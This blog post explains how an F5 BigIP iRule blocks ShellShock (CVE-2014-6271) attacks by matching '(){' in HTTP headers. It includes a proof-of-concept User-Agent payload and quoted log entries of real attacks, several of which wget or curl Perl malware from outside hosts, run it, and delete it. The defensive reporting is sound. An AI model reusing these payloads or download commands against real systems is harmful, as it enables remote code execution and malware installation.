Use a BigIP iRule to further defend against ShellShock

By now you’ve no doubt heard about ShellShock, and have quickly worked to patch all your systems to close the most vulnerable aspects of this pervasive exploit. You may even be aware that some users are reporting that even the patch hasn’t fully closed the vulnerability (it seems that while the patch prevents execution from arbitrary code execution, aliasing commands is still possible).

The exploit is pretty simple to execute; the user-agent header here will write the text “HACKED” to a file named hack.txt in the /tmp directory on a vulnerable server:

GET /cgi-bin/anypage.html HTTP/1.1
Host: yourhost
User-Agent: () { :;}; echo HACKED >>/tmp/hack.txt 
Accept: text/xml,application/xml
Accept-Language: en-us

So, in addition to patching your servers, if you’ve got a BigIP server in front of your systems, you can also set up an iRule on your system to prevent the traffic from even getting through to your servers by looking for those characters ( “(){” ) in any of your headers:
big-ip-irule-shellshock

The details of the iRule are posted on F5’s forum and F5 even maintains a dedicated up-to-date ShellShock information page. Basically there are two versions of the iRule; one that trades off a tiny bit of performance to log the attack attempts, and one that’s designed to be slightly more performant but lacks logging.

Sure enough, within minutes of applying this iRule to our front-end servers at a client site, we started seeing attack attempts in the BigIP logs. So be warned: the bad guys are out there and they’re actively exploiting this bug, so do everything you can to secure your systems!

Here are some example attacks, doing everything from testing a server to downloading and executing Perl malware (and covering its tracks!):

Sep xx tmm tmm[1665]: Rule block_shellshock : Detected CVE-2014-6271 attack from ‘54.251.83.67’ in HTTP Header User-Agent = ‘() { :;}; /bin/bash -c “echo testing9123123”; /bin/uname -a’; URI = ‘/’

Sep xx tmm tmm[1665]: Rule block_shellshock : Detected CVE-2014-6271 attack from ‘173.45.100.18’ in HTTP Header User-Agent = ‘() { :;}; /bin/bash -c “cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*”‘; URI = ‘/cgi-bin/hi’

Sep xx tmm tmm[1665]: Rule block_shellshock : Detected CVE-2014-6271 attack from ‘128.199.207.34’ in HTTP Header User-Agent = ‘() { :;}; /bin/bash -c ‘cd /tmp; wget http://dl.directxex.net/download/nice.png; perl nice.png; rm -rf nice.png”; URI = ‘/cgi-sys/defaultwebpage.cgi’

It’s funny how cleanly commented and versioned this malware is. If there’s any doubt about what these bad guys are trying to download, here’s some of the source code:
shellshock-malware
shellshock-attack-script

Tags: , , ,

Leave a Reply